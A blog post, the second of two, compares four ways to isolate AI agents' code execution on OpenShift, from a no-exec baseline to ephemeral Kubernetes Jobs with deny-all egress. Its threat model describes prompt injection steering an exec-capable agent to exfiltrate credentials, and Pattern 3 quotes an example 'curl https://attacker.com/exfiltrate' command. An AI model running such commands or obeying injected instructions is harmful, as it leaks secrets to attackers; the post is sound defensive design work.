Code Execution Isolation Patterns for AI Agents in Kubernetes

Exec Isolation Patterns for AI Agents in Kubernetes

From locked-down baseline to ephemeral sandboxes — POC of four architectures/patterns validated on Redhat OpenShift, and why the choice is a security decision

Part 2 of 2

← [Part 1: Every AI Coding Tool Is an Agent VM]

In Part 1, I established the three-layer architecture behind every agentic system and explained that whether or not the agent needs to execute code results in different security postures.

This article covers four patterns across a spectrum of isolation validated on a local OpenShift cluster, as well as the threat model that explains why the choice between them isn’t just an ops decision.

The Threat First

Before patterns: the threat model.

Prompt injection is the scenario where an adversarial input (be it a document the agent reads, a web page it fetches or a tool response from an upstream API) contains instructions that manipulate the agent into taking unintended actions. OWASP lists it as the primary risk for agentic systems. [¹]

Against an agent with no exec capability, the blast radius is bounded to what it can do through API calls: a bad API call, malicious output, accessing data it shouldn’t. This limits potential damage that can be caused.

Against an agent with exec capability and a writable filesystem, a successful prompt injection is equivalent to arbitrary code execution inside your cluster pod. The attacker can potentially exfiltrate environment variables (which could contain API keys, database credentials, service tokens), spawn persistent subprocesses, write to writable paths, or make outbound calls to attacker-controlled systems and infrastructure.

The four patterns below are four different answers to the same question: how do you give an agent execution capability while limiting what a compromised exec surface can actually do?

The Lab Setup for the POC/Demo

All four patterns run the same agent: a LangGraph Planner→Researcher→Analyst pipeline, calling a Claude model via Amazon Bedrock. The agent code is identical across all four. What changes is the execution environment wired to Layer 2.

A note on accuracy: The cluster outputs and security configs below were validated on a CRC local cluster (OCP 4.x) Openshift. Implementation details such as SCC behaviour, NetworkPolicy DNS ports, resource quotas, etc, vary by platform and version. Treat the patterns as reference architectures and verify against your own cluster’s security policies before adopting them.

The exec component is a minimal FastAPI service: accepts `POST /exec {code, runtime}`, runs Python or bash in a subprocess, returns `{stdout, stderr, exit_code}`. The security work happens in where it runs and what it can reach and not necessarily inside the server itself.

Agent (LangGraph pipeline)
    │
    │  POST /exec {"code": "import sys; print(sys.version)", "runtime": "python"}
    ▼
[exec server]  <---- this is what changes between patterns
    │
    └── returns {stdout, stderr, exit_code}

Pattern 1 — No-Exec Baseline

The idea: The agent has no exec-surface / subprocess tool and cannot run LLM-generated code at runtime. It can still call APIs, query databases, and invoke any tool explicitly wired by the developer. Nothing executes as a subprocess inside the cluster.

The setup for this POC:

┌──────────────────────────────────────────────────────────┐
│  Pod: agent-vm-part1                                     │
│                                                          │
│  ┌────────────────────────────────────────────────────┐  │
│  │  agent container                                   │  │
│  │  readOnlyRootFilesystem: true (/tmp via emptyDir)  │  │
│  │  allowPrivilegeEscalation: false                   │  │
│  │  capabilities: DROP ALL                            │  │
│  └────────────────────────────────────────────────────┘  │
│                                                          │
│  No exec server. No subprocess tool. Root fs read-only.  │
└──────────────────────────────────────────────────────────┘


╔══════════════════════════════════════════════════════╗
║           AGENT VM — THREE-LAYER CONFIG              ║
╠══════════════════════════════════════════════════════╣
║  Layer 1 (Runtime):  OCP pod · pattern=no-exec       ║
║  Layer 2 (Tools):    LLM API only — no code execution║
║  Layer 3 (Skills):   analysis, research, synthesis   ║
╚══════════════════════════════════════════════════════╝

The enforcement here works at two layers. The primary enforcement is at the application layer: the LangGraph graph has no exec tool registered, so the LLM has no function to call that spawns a subprocess. ‘readOnlyRootFilesystem: true’ is the infrastructure layer secondary enforcement which prevents writes to the root filesystem (but `/tmp` is writable via an emptyDir mount since it is required for the Python runtime to function). Skills are mounted read-only from a ConfigMap at `/app/skills`.

The primary enforcement is two lines in the agent application:

# agent-app/app/main.py - run_code() is the only exec pathway in the agent
async def run_code(code: str, runtime: str = "python3") -> str:
if AGENT_PATTERN == "no-exec":
return "[exec not available in no-exec pattern]"

The LLM cannot call `run_code()` directly and can only invoke tools explicitly registered in the LangGraph graph. In Pattern 1, no exec tool is registered.

When to use potentially: Agents doing text outputs such as synthesis, summarisation, Q&A, research, orchestration. If the LLM’s job is to reason and return structured output rather than run code, there may not be a reason to introduce an exec surface. This is the right default for perhaps the majority of well defined enterprise AI use cases.

Pattern 2 — Sidecar Exec Server

The idea: Run the exec server as a second container in the same pod as the agent. The agent calls it at `localhost:9000` without network hop, DNS, or any separate k8s deployment.

┌──────────────────────────────────────────────────────────┐
│  Pod: agent-vm-part2                                     │
│                                                          │
│  ┌──────────────────────┐    ┌─────────────────────────┐ │
│  │  agent               │    │  exec-server (sidecar)  │ │
│  │                      │───►│                         │ │
│  │  readOnly: true      │    │  readOnly: false        │ │
│  │  caps: DROP ALL      │    │  /tmp writable          │ │
│  │                      │    │  caps: DROP ALL         │ │
│  └──────────────────────┘    └─────────────────────────┘ │
│                                                          │
│  Shared network namespace (localhost:9000)               │
└──────────────────────────────────────────────────────────┘

The agent container stays maximally locked down. The exec-server sidecar relaxes exactly what it needs, providing a writable `/tmp` for script execution. The key difference from Pattern 1 is a single env var change and a second container in the deployment:

# part2-sidecar/01-deployment-sidecar.yaml (excerpted)
containers:
- name: agent
  securityContext:
    readOnlyRootFilesystem: true   # agent stays locked
    allowPrivilegeEscalation: false
    capabilities: { drop: ["ALL"] }
  env:
  - name: AGENT_PATTERN
    value: "sidecar"
  - name: EXEC_SERVER_URL
    value: "http://localhost:9000"  # sidecar in same pod

- name: exec-server
  securityContext:
    readOnlyRootFilesystem: false   # exec server needs to write scripts to /tmp
    allowPrivilegeEscalation: false
    capabilities: { drop: ["ALL"] }

2 containers in the pod; agent locked while exec-server isn’t; python execution confirmed via route

The agent and exec-server share a pod; share the same IP, same network namespace, same lifecycle. A prompt injection that manipulates the exec-server can reach anything the agent pod can reach, because they share a namespace.

For internal agents where inputs are trusted (developer tooling, internal data pipelines, tightly scoped automation), sidecar is operationally simple and reasonable. The exposure is limited by whatever NetworkPolicy applies at the pod level.

Pattern 3 — Separate Exec Pod

The idea: Move the exec server out of the agent pod entirely as its own separate pod. The key addition herewould be that the exec pod has deny-all egress to highlight the different network policies being applied to the 2 pods.

┌──────────────────────────┐    cluster DNS    ┌────────────────────────────┐
│  Pod: agent-vm-part3     │  ──────────────►  │  Pod: exec-server-part3    │
│                          │  exec-svc:9000    │                            │
│  agent                   │                   │  exec-server               │
│  readOnly: true          │                   │  /tmp writable             │
│  egress: LLM + exec svc  │                   │  egress: DENY ALL          │
└──────────────────────────┘                   └────────────────────────────┘

Even if a prompt injection causes the exec-server to run `curl https://attacker.com/exfiltrate`, the NetworkPolicy blocks it. The exec surface cannot reach the LLM, cannot reach external APIs, and cannot phone home (ahaha abit of a simplified example).

The isolation is enforced by a NetworkPolicy on the exec pod — one field does the work:

# part3-sandbox/03-networkpolicy.yaml (excerpted)
# Exec pod: deny all egress
spec:
  podSelector:
    matchLabels:
      app: exec-server-part3
  policyTypes: [Ingress, Egress]
  ingress:
  - from: [podSelector: {matchLabels: {app: agent-vm-part3}}]
    ports: [{port: 9000}]
  egress: []   # ← deny all — exec pod has zero outbound network access

The agent pod gets egress allowed to the exec service on port 9000, DNS on 53, HTTPS on 443 for the LLM API, etc.

two separate pods; Exec pod’s egress blocked; calling agent pod results in code run in exec pod

Compared to a sidecar container, a separate pod provides stronger isolation but more operational overhead — Two Deployments, one Service, one NetworkPolicy per agent. But the blast radius of a compromised exec surface is more contained. I would say, this security posture might be more for user-facing agents processing untrusted inputs — documents, web content, user-submitted data.

Pattern 4 — Exec Dispatcher (Ephemeral Jobs)

Patterns 2 and 3 share a structural problem: the exec surface is always on. There’s a running exec-server container or pod regardless of whether or not the agent is currently executing any code. For a platform with ten deployed agents, that’s ten idle exec surfaces consuming resources. Pattern 4 is just a continuation of 3, spinning up the exec environment on demand when the agent needs it, and tears down after. On Kubernetes, the natural primitive is [ephemeral] Jobs.

Agent  (namespace: agent-vm-poc-demo)
  │
  │  POST /exec {code, runtime}
  ▼
Exec Dispatcher Service  (namespace: agent-vm-poc-execdispatcher)
  │
  ├── Creates K8s Job: fresh container, code injected as env var
  ├── Polls until succeeded/failed
  ├── Fetches pod logs
  ├── Deletes Job (TTL as safety net)
  └── Returns {stdout, exit_code, job_id, duration_ms}
                     │
              ┌──────┴──────┐
              │  exec Job   │  (namespace: agent-vm-poc-execjobs)
              │  pod        │  deny-all NetworkPolicy
              │  ephemeral  │  no ServiceAccount token mounted
              │  TTL: 60s   │  fresh container per invocation
              └─────────────┘

In this POC, i have them in three separate namespaces:

`agent-vm-poc-demo` — agent pods. Can POST to dispatcher. Cannot create Jobs directly.

`agent-vm-poc-execdispatcher` — dispatcher service. Has RBAC to create/delete Jobs in the execjobs namespace. Has K8s API access. Does not execute code itself.

`agent-vm-poc-execjobs` — ephemeral Job pods only. Deny-all NetworkPolicy (no egress, no ingress except kubelet), has no ServiceAccount token and Pod exits after running the code.

The dispatcher is the only component with permission to create Jobs in the exec namespace. The agent’s ServiceAccount cannot touch the K8s API.

The agent code is unchanged from Pattern 1 — only two env vars differ:

# part4-dispatcher agent deployment (excerpted)
env:
- name: AGENT_PATTERN
  value: "exec-dispatcher"
- name: EXEC_SERVER_URL
  value: "http://exec-dispatcher-svc.agent-vm-poc-execdispatcher.svc.cluster.local:8080"

Without showing the details of the dispatcher service, the idea is that the run_code() in the agent calls EXEC_SERVER_URL/exec regardless of pattern. The dispatcher receives that call, creates an ephemeral Job, waits for it to complete, and returns the output. From the agent's perspective, the API contract is same as Pattern 2 and 3.

The output hostname `exec-job-9ba7506d-kbtkw` is the ephemeral Job pod’s own name. It ran the code, printed its hostname, exited, and was garbage-collected. By the time the test completed, the execjobs namespace was empty again.

Compared to static exec pods, this provides the added benefits of:

- No idle exec surface — attack surface only exists during actual execution

- Fresh container per task — no state leakage between runs; a prompt injection that poisons `/tmp` in run N cannot affect run N+1

- Principle of least privilege at namespace scope — the agent never touches the K8s API, the dispatcher never executes code directly, the Job pod has no credentials

- Resource efficiency — (Theoretical) exec capacity scales with actual demand, not with number of deployed agents.

Note: This idea is theoretically good to me, but requires solutioning beyond this POC. Building a reliable dispatcher requires handling K8s API connectivity carefully, pod log fetching timing, and quota management in the exec namespace. Uhm, so it may not be that easy to productionize.

Summary and Concluding Remarks

(Not based on production experience) Consider these:

1. Default to no-exec. Deploy with `readOnlyRootFilesystem: true`, `allowPrivilegeEscalation: false`, capabilities dropped, deny-all egress except specific endpoints.

2. If you need exec, use the separate-pod pattern first. Don’t reach for sidecar because it’s simpler. The separate pod with separated Network Policy gives you meaningful blast-radius containment.

3. If you’re building a platform, invest in a version of the dispatcher. It scales across many agents without accumulating idle exec surface.

The insight from Part 1 holds: Cursor and Claude Code work smoothly on your laptop because they have full Layer 1 trust. The challenge this POC is trying to address regarding production agent deployment is building a runtime that gives agents *just exactly enough* Layer 1 capability for the task.

Again this article isn’t meant to share a tried and tested production architecture or playbook; it’s simply meant to spark some thought and share my explorations (hence no github link shared :P).

References

¹ OWASP. *LLM01: Prompt Injection*. OWASP Top 10 for Large Language Model Applications, 2025. https://owasp.org/www-project-top-10-for-large-language-model-applications/

Code Execution Isolation Patterns for AI Agents in Kubernetes was originally published in Towards AI on Medium, where people are continuing the conversation by highlighting and responding to this story.